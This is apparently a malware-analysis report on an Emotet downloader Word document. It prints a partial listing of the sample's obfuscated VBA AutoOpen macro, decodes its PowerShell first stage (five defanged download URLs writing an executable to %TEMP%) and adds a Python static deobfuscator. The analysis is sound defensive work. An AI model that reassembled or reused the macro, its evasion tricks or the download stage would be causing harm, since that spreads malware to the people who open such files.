Verdict: MALICIOUS
Risk score: 142

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Word document carrying a VBA project whose `AutoOpen` procedure runs as soon as the file is opened with macros enabled. ClamAV's signature `Doc.Downloader.Emotet-6883997-0` attributes it to the Emotet downloader family, and the extracted source has that loader's standard shape: every procedure runs under `On Error Resume Next` and is padded with junk `TypeName` calls, the command line is assembled from dozens of short string fragments spread across helper functions, and the result is passed to `Shell`, written as `Shell@` with a type-declaration character appended to the name, which VBA accepts but which defeats naive `Shell(` pattern matching. The window-style argument `426826034 - 426826034` evaluates to 0 (`vbHide`), so no console window is shown.

The recovered command begins `cmd /V/C"set 08Si=...&&for %l in (0;51;20;60;4;...`. `/V` enables delayed environment-variable expansion, `CStr(Chr(... + 34 + ...))` is a double quote (the undeclared names added to 34 are Empty and contribute 0), the `set` stores a 76-character lookup table in the variable `08Si`, and the `for` loop walks a list of indices into that table to build the next stage one character at a time. Concatenating the fragments of the two helper functions that survive in the preview (`zVfEVdDbLw`, whose return line shows that the fragments are joined in assignment order, and `OvjYED`) and applying the resulting indices to the table gives the start of the decoded stage, defanged here:

`powershell $Xjc=new-object Net.WebClient;$jfB='hxxp://tnfirst[.]com/pXL@hxxp://theteemovie[.]com/5ptwRMVq@hxxp://www[.]sundayplanning[.]com/oHkM@hxxp://tekky[.]net/ghzNO@hxxp://tecleweb[.]com[.]br/fGW94oic'.Split('@');$jio = '138';$KKp=$env:temp+'\'+$jio+'.exe';foreach($PwI in $jfB){try{$Xjc.`

That is the familiar Emotet first stage: five candidate download URLs to be tried in turn, with a destination path of `%TEMP%\138.exe`. The preview is cut off before the remaining helper functions and the loop body, so the decoded text stops mid-expression; the full `macros.bas` artifact is needed for the rest. The only URL the scanner extracted from the document body, `http://schemas.openxmlformats.org/drawingml/2006/main`, is the DrawingML XML namespace present in ordinary Office files and is not an indicator.
Heuristics (5)

- ClamAV: Doc.Downloader.Emotet-6883997-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6883997-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro, i.e. code that runs automatically when the document is opened with macros enabled.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this generic description does not fit this sample: a VBA project was recovered (see the `macros.bas` artifact below), so the AutoOpen finding above is the one that matters.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace that every Office drawing part references; it is not a download location.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5640 bytes | f99d725a484b4b8f0f344914b519557eecb8c78fbc9ff182be34c5c7d5d803f0 |
Preview script (first 1,000 lines of the extracted script; this copy of the page is cut off partway through `OvjYED`)

```vb
Attribute VB_Name = "NvPcFiPp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName ChrB(aQikRU)
TypeName Round(9795 - PVOmTL)
TypeName Hex(1)
TypeName CDate(4)
TypeName CBool(918)
Shell@ CStr("c") + CStr("m") + pECLAjtCjwfWX + fwQpEYk + zVfEVdDbLw + OvjYED + iOLwDqE + ujHOZYuUzwX + DkZsPWdPpPQ + OkhZLroNHVudK, 426826034 - 426826034
TypeName CSng(ZmGBEl)
TypeName ahjCE
TypeName ChrW(9)
End Sub
Attribute VB_Name = "AuNJzwvRFqPw"
Function zVfEVdDbLw()
On Error Resume Next
TypeName 8055
TypeName CStr(80)
TypeName Cos(849)
UYDZW = "d /V/C" + CStr(Chr(skPmKzwiiTdO + slXfLlFZIVQoWX + 34 + ZlmqUclOK + hniLZfjOqkrY)) + "s" + "et 08" + "Si=pd" + "NMrkhWA" + "Sfuw" + "hzC"
TypeName Sqr(258072599)
TypeName Round(933)
QvjOL = "juQ" + "Fwidzl" + "QV" + "GOa" + "cj,-;9b8" + "@nH1g$D3{4"
TypeName 6
TypeName 6354
TypeName Rnd(oRGnL - FofQHQ / pwpQlq / djKBDL)
nHEnYwN = "\mxo" + "B)( XPyte" + "sIK.q" + "=5L+v" + "/':R}&" + "&for %l " + "in (0;5"
TypeName Int(OaJpb / cqrqYi)
TypeName 53
TypeName 2
MDXaFz = "1;2" + "0;60" + ";4;" + "61;13;6" + "0;"
TypeName HFkAB
TypeName ChrB(531)
TypeName Cos(QPRRsj)
bSzjWTtF = "24;24;" + "5" + "5;43;5" + "6;" + "3" + "1;3" + "0;66;3" + "9;60;" + "20;3" + "3"
TypeName Hex(TzBGj)
TypeName CBool(iIACm)
SpopK = ";5" + "1;36" + ";31;60;30" + ";59;55;2;" + "60;59;" + "64;7;60;36" + ";15;24;21;" + "60;39;59" + ";34" + ";43;" + "31;10;52"
TypeName rVjtr
TypeName 4840
TypeName Fix(QfqEiV)
hXKDMHtP = ";66;72;" + "13" + ";59;" + "59" + ";0;73;71;7" + "1;59;39" + ";10;21;4" + ";" + "6"
TypeName Sgn(KLOmJj)
TypeName CDbl(52)
liNlLCoXiU = "1;5" + "9;64;3" + "0;51;49;" + "71;" + "0" + ";56" + ";68;38;" + "13" + ";59;59" + ";0;73;71;7"
TypeName Isjztf
TypeName Rnd(QbYtk)
TypeName Atn(fVAoLo)
fGwWPhPi = "1;59;13;" + "60;" + "59;4;60" + ";60" + ";49;51;" + "7" + "0;21;6" + "0;64;30;" + "51" + ";49;71;6"
TypeName ChrB(czMii * QkrRWY)
TypeName ChFzT
TypeName 952
ERPnccD = "7;0;" + "59;20;" + "74;3;26;65" + ";38;" + "13;59" + ";59;0;73;7" + "1;71;20;20" + ";2" + "0;64;61;17" + ";" + "39;22;" + "29;58;0;"
zVfEVdDbLw = UYDZW + QvjOL + nHEnYwN + MDXaFz + bSzjWTtF + SpopK + hXKDMHtP + liNlLCoXiU + fGwWPhPi + ERPnccD
TypeName aFmTn
TypeName Atn(4)
End Function
Function OvjYED()
On Error Resume Next
TypeName Oct(jbVtSJ / uFQzt + 33138 * XXQVM)
TypeName CBool(JGzmZv)
TypeName Chr(8)
WECjh = "24;29" + ";39" + ";39;21;39" + ";42;64" + ";30;51;" + "49;71;" + "51;40;5;" + "3;3" + "8;1" + "3;59;59;0" + ";73"
TypeName jTusXW
TypeName XvDOfY
WAAbKs = ";71" + ";71;59" + ";60;5" + ";" + "5;58;64;3" + "9;60;59;" + "7" + "1;42" + ";13;23;2;2"
TypeName CDbl(PvXQvS + nROtjk)
TypeName CByte(wlokj / ditcbj)
TypeName CSng(cSNaWP)
unAvFQTdh = "8;38;1" + "3;5" + "9;59;0;7" + "3;71;71" + ";59;60" + ";30;" + "24;60;20;" + "60" + ";36;"
TypeName Rnd(oABEFI)
TypeName nhalN
SmutaXCOYj = "64;30;" + "51" + ";49;64" + ";36;" + "4;71;10;27" + ";7;35;47;" + "51;2" + "1;30;" + "72" + ";64;9" + ";" + "0;24;21;59" + ";54;72;38"
TypeName Chr(hPuYiG * NJojAD)
TypeName GXkZZV
GDLnkrz = ";72;53" + ";34;4" + "3;31" + ";21;51;5" + "5;66;55;" + "72;41;45;3" + "7;72;34;4" + "3" + ";63;6" + "3;0;66;43;" + "60;39;7" + "0;73;5"
TypeName Atn(86124 - iBDFsQ)
TypeName ChrW(534)
zVIRoiCAc = "9;6" + "0;4" + "9;0;69" + ";7" + "2;48;72;69" + ";43"
TypeName ChrW(88149 * bhDiS / uRbYzi - TOckHR)
TypeName 767
NGijU = ";31;21;5" + "1;69;7" + "2;64;60;50" + ";60;72;3" + "4;10;51;" + "4;60;29" + ";30;13;54;" + "43;57;2"
TypeName vEiHRY
TypeName Log(44110 / minnG + 47681 / vZjHd)
TypeName Sqr(NOQfqj + GhQcRC)
LwSiwM = "0;62;55" + ";21;39;" + "55;4" + "3;31;1" + "0;52;53" + ";46;" + "59;4;58;46" + ";43;56;3" + "1;30;64;"
TypeName Hex(395163932)
Ty
```

... (truncated)
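To turn a preview like the one above into the stage-1 command without opening the document in Word, the string fragments can be concatenated statically. The Python script below is an added example written for this page; it is not code from the analysis platform, from oletools or from the sample. It assumes the shape visible in the extract: an `AutoOpen` that passes a `+`-chain of `CStr()` literals and helper-function names to `Shell`, helpers padded with junk `TypeName` statements that return a concatenation of their own string fragments, `CStr(Chr(... + 34 + ...))` for the quote character, and a `set TABLE=...&&for %l in (indices)` index loop. It evaluates `Chr()` with every undeclared name treated as Empty (0), as VBA does, and resolves the index loop by picking `TABLE[i]` for each index instead of letting `cmd.exe` do it. The embedded VBA (`SAMPLE_VBA`, with helpers `partA`/`partB`, the junk name `junkName` and the nine-character table `poewhrsll`) is constructed for the demo because the page's listing is truncated; the loop-body form `do set OUT=!OUT!!TABLE:~%l,1!` is the common Emotet one and is an assumption about the part of the real command that the preview cuts off.

```python
import re

# Constructed VBA in the shape of the macro on this page: junk TypeName lines, a
# Shell@ call over "+"-joined CStr() literals and helper functions, "d /V/C",
# Chr(... + 34 + ...), and a set/for index loop. The page's listing is truncated,
# so these fragments, names and the 9-character table are invented for the demo.
SAMPLE_VBA = r'''
Sub AutoOpen()
On Error Resume Next
TypeName ChrB(aQikRU)
Shell@ CStr("c") + CStr("m") + junkName + partA + partB, 426826034 - 426826034
End Sub
Function partA()
On Error Resume Next
UYDZW = "d /V/C" + CStr(Chr(skPmKz + slXfLl + 34 + ZlmqUc)) + "s" + "et TB=" + "po" + "ewhrsll"
TypeName Sqr(258072599)
QvjOL = "&&for %l " + "in (0;1;3;2;5;" + "6;4;2;7;8) do set "
partA = UYDZW + QvjOL
End Function
Function partB()
nHEnYwN = "CM=!CM!!TB:~%l,1!" + "&&if %l==8 call " + "%CM:~-10%" + CStr(Chr(34))
partB = nHEnYwN
End Function
'''

BLOCK_RE = re.compile(r'^(Sub|Function)\s+(\w+)\s*\(\)(.*?)^End \1', re.S | re.M)
ASSIGN_RE = re.compile(r'^(\w+)\s*=\s*(.+)$')
SHELL_RE = re.compile(r'^\s*Shell\W*(.*),\s*([\d\s+\-*/()]+)$')
# Concatenation operands: a string literal, a call (one nesting level) or a bare name.
TERM_RE = re.compile(r'"[^"]*"|\w+\((?:[^()]|\([^()]*\))*\)|\w+')
# Start of the cmd.exe index loop: set TABLE=chars&&for %i in (n;n;...
LOOP_RE = re.compile(r'set (\w+)=(.*?)&&for %\w in \(([\d;]+)')


def assignments(body):
    """(name, expression) pairs; the junk TypeName lines and the Shell call are skipped."""
    for line in (raw.strip() for raw in body.splitlines()):
        m = ASSIGN_RE.match(line)
        if m and not line.startswith(('TypeName', 'On Error', 'Shell')):
            yield m.group(1), m.group(2)


def eval_term(term, local_vars, blocks, cache):
    """Evaluate one operand as VBA does when every undeclared name is Empty."""
    if term.startswith('"'):
        return term[1:-1]
    m = re.fullmatch(r'(CStr|Chr)\((.*)\)', term)
    if m and m.group(1) == 'CStr':           # CStr("x"), CStr(Chr(...)): just unwrap
        return eval_term(m.group(2), local_vars, blocks, cache)
    if m:                                    # Chr(a + 34 + b): names are 0, so sum the literals
        return chr(sum(int(n) for n in re.findall(r'\b\d+\b', m.group(2))))
    if term in local_vars:
        return local_vars[term]
    if term in blocks:                       # helper function: use its return value
        return eval_function(term, blocks, cache)
    return ''                                # Empty concatenates as ""


def eval_expr(expr, local_vars, blocks, cache):
    return ''.join(eval_term(t, local_vars, blocks, cache) for t in TERM_RE.findall(expr))


def eval_function(name, blocks, cache):
    """A VBA function returns whatever was last assigned to its own name."""
    if name not in cache:
        local_vars = {}
        for lhs, rhs in assignments(blocks[name]):
            local_vars[lhs] = eval_expr(rhs, local_vars, blocks, cache)
        cache[name] = local_vars.get(name, '')
    return cache[name]


def recover_shell(vba, entry='AutoOpen'):
    """Return (command line, window style) for the Shell call in the entry procedure."""
    blocks = {name: body for _, name, body in BLOCK_RE.findall(vba)}
    cache, local_vars = {}, {}
    for lhs, rhs in assignments(blocks[entry]):
        local_vars[lhs] = eval_expr(rhs, local_vars, blocks, cache)
    for line in blocks[entry].splitlines():
        m = SHELL_RE.match(line)
        if m:
            cmd = eval_expr(m.group(1), local_vars, blocks, cache)
            style = eval(m.group(2), {'__builtins__': {}})  # digits and operators only (SHELL_RE)
            return cmd, style
    raise ValueError('no Shell call in ' + entry)


def decode_index_loop(cmd):
    """Resolve the table/index trick statically instead of letting cmd.exe run it."""
    # Assumes the loop body is the usual 'do set OUT=!OUT!!TABLE:~%i,1!', so each
    # index selects one character of TABLE; a truncated index list still decodes.
    m = LOOP_RE.search(cmd)
    if not m:
        return None
    table = m.group(2)
    return ''.join(table[int(i)] for i in m.group(3).split(';') if i)


if __name__ == '__main__':
    cmd, style = recover_shell(SAMPLE_VBA)
    print(style, cmd, decode_index_loop(cmd), sep='\n')
```

Point `recover_shell` at the contents of the `macros.bas` artifact to decode a real extract. Helper names that the preview cut off resolve to empty strings, so a truncated listing yields a shorter command rather than an error, and `decode_index_loop` then returns as much of the next stage as the available indices cover; on the table and the first indices visible above it returns the `powershell $Xjc=` prefix.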